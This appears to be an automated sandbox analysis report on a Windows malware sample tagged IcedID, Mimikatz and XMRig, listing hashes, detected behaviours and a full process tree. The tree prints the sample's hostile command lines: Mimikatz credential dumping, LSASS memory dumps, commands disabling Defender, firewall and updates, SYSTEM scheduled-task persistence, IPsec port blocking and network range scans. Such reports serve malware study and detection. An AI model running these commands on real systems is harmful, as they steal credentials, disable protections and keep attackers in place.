Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    14-09-2024 11:26

General

  • Target

    2024-09-14_62adea51f08e0d8cfdebe1a2bc16f786_hacktools_icedid_mimikatz.exe

  • Size

    8.7MB

  • MD5

    62adea51f08e0d8cfdebe1a2bc16f786

  • SHA1

    7fce3b3374e6d0e118a191fc40d5a0b842b8c088

  • SHA256

    83830027e40ccd5e86eb50c0387de4292c35628b491824b82015973c41e1b889

  • SHA512

    d4e59eb3fefd01c905d060ebd601f289705034cdbc69d0911daaa482045c73983f1c602e33dffd3b4b4db8c32c97f948f84599dc66b800945e2ddc33f3f6f8e4

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (20227) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 3 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 13 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1012
      • C:\Windows\TEMP\turtkcnue\jkczbb.exe
        "C:\Windows\TEMP\turtkcnue\jkczbb.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1392
    • C:\Users\Admin\AppData\Local\Temp\2024-09-14_62adea51f08e0d8cfdebe1a2bc16f786_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-09-14_62adea51f08e0d8cfdebe1a2bc16f786_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4116
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lhirpauw\ifzaime.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:980
        • C:\Windows\lhirpauw\ifzaime.exe
          C:\Windows\lhirpauw\ifzaime.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1560
    • C:\Windows\lhirpauw\ifzaime.exe
      C:\Windows\lhirpauw\ifzaime.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1916
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4400
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2568
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4332
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:832
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1352
      • C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static del all
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2136
      • C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add policy name=Bastards description=FuckingBastards
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:4480
      • C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filteraction name=BastardsList action=block
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:1036
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Windows\bnbjunmgy\itcahvdec\wpcap.exe /S
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3880
        • C:\Windows\bnbjunmgy\itcahvdec\wpcap.exe
          C:\Windows\bnbjunmgy\itcahvdec\wpcap.exe /S
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1028
          • C:\Windows\SysWOW64\net.exe
            net stop "Boundary Meter"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4296
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop "Boundary Meter"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3712
          • C:\Windows\SysWOW64\net.exe
            net stop "TrueSight Meter"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3056
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop "TrueSight Meter"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:956
          • C:\Windows\SysWOW64\net.exe
            net stop npf
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2432
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop npf
              5⤵
                PID:1792
            • C:\Windows\SysWOW64\net.exe
              net start npf
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:5008
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                5⤵
                  PID:812
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2744
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3352
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1100
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:4972
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3664
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1764
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\bnbjunmgy\itcahvdec\bvncnflyu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bnbjunmgy\itcahvdec\Scant.txt
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1584
            • C:\Windows\bnbjunmgy\itcahvdec\bvncnflyu.exe
              C:\Windows\bnbjunmgy\itcahvdec\bvncnflyu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bnbjunmgy\itcahvdec\Scant.txt
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1352
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\bnbjunmgy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bnbjunmgy\Corporate\log.txt
            2⤵
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:5072
            • C:\Windows\bnbjunmgy\Corporate\vfshost.exe
              C:\Windows\bnbjunmgy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
              3⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1728
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "neieiybei" /ru system /tr "cmd /c C:\Windows\ime\ifzaime.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:4012
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3192
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /sc minute /mo 1 /tn "neieiybei" /ru system /tr "cmd /c C:\Windows\ime\ifzaime.exe"
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4668
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "felcleand" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:872
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3032
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /sc minute /mo 1 /tn "felcleand" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F"
              3⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1944
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "efuycteei" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F"
            2⤵
              PID:5100
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4188
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "efuycteei" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4024
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:5084
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:4476
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:4880
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3312
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4300
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3592
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3636
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:312
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2460
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:4572
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3964
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4888
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net stop SharedAccess
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3012
              • C:\Windows\SysWOW64\net.exe
                net stop SharedAccess
                3⤵
                • System Location Discovery: System Language Discovery
                PID:5000
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop SharedAccess
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1288
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c netsh firewall set opmode mode=disable
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4972
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall set opmode mode=disable
                3⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:4976
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c netsh Advfirewall set allprofiles state off
              2⤵
                PID:4268
                • C:\Windows\SysWOW64\netsh.exe
                  netsh Advfirewall set allprofiles state off
                  3⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:228
              • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 784 C:\Windows\TEMP\bnbjunmgy\784.dmp
                2⤵
                • Executes dropped EXE
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                PID:2476
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net stop MpsSvc
                2⤵
                  PID:2956
                  • C:\Windows\SysWOW64\net.exe
                    net stop MpsSvc
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4440
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MpsSvc
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:592
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop WinDefend
                  2⤵
                    PID:2968
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                        PID:3892
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1592
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2076
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                          PID:1496
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop wuauserv
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1628
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config MpsSvc start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4528
                        • C:\Windows\SysWOW64\sc.exe
                          sc config MpsSvc start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:2776
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config SharedAccess start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3552
                        • C:\Windows\SysWOW64\sc.exe
                          sc config SharedAccess start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:3668
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config WinDefend start= disabled
                        2⤵
                          PID:3052
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:2456
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4688
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:2376
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:2676
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 336 C:\Windows\TEMP\bnbjunmgy\336.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:644
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 1012 C:\Windows\TEMP\bnbjunmgy\1012.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:764
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2540 C:\Windows\TEMP\bnbjunmgy\2540.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4744
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2924 C:\Windows\TEMP\bnbjunmgy\2924.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3408
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2992 C:\Windows\TEMP\bnbjunmgy\2992.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2568
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2172 C:\Windows\TEMP\bnbjunmgy\2172.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3012
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 3748 C:\Windows\TEMP\bnbjunmgy\3748.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2256
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 3868 C:\Windows\TEMP\bnbjunmgy\3868.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3492
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 3936 C:\Windows\TEMP\bnbjunmgy\3936.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5100
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 4048 C:\Windows\TEMP\bnbjunmgy\4048.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2196
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2868 C:\Windows\TEMP\bnbjunmgy\2868.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:220
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 1204 C:\Windows\TEMP\bnbjunmgy\1204.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4668
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 1716 C:\Windows\TEMP\bnbjunmgy\1716.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2060
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 2680 C:\Windows\TEMP\bnbjunmgy\2680.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4432
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 4032 C:\Windows\TEMP\bnbjunmgy\4032.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2632
                        • C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe
                          C:\Windows\TEMP\bnbjunmgy\lhynnnjru.exe -accepteula -mp 4544 C:\Windows\TEMP\bnbjunmgy\4544.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3260
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c C:\Windows\bnbjunmgy\itcahvdec\scan.bat
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4404
                          • C:\Windows\bnbjunmgy\itcahvdec\hransculn.exe
                            hransculn.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:3944
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4848
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1616
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:5000
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2568
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3508
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:5048
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1496
                      • C:\Windows\SysWOW64\nspfso.exe
                        C:\Windows\SysWOW64\nspfso.exe
                        1⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:2620
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F
                        1⤵
                        PID:1616
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          2⤵
                          PID:4476
                        • C:\Windows\system32\cacls.exe
                          cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F
                          2⤵
                          PID:2064
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ifzaime.exe
                        1⤵
                        PID:4664
                        • C:\Windows\ime\ifzaime.exe
                          C:\Windows\ime\ifzaime.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4780
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F
                        1⤵
                        PID:1628
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          2⤵
                          PID:4320
                        • C:\Windows\system32\cacls.exe
                          cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F
                          2⤵
                          PID:1792
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F
                        1⤵
                        PID:5212
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          2⤵
                          PID:4348
                        • C:\Windows\system32\cacls.exe
                          cacls C:\Windows\lhirpauw\ifzaime.exe /p everyone:F
                          2⤵
                          PID:4280
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ifzaime.exe
                        1⤵
                        PID:5592
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\turtkcnue\jkczbb.exe /p everyone:F
                        1⤵
                        PID:5172

                                              Network

                                              MITRE ATT&CK Enterprise v15


                                              Downloads


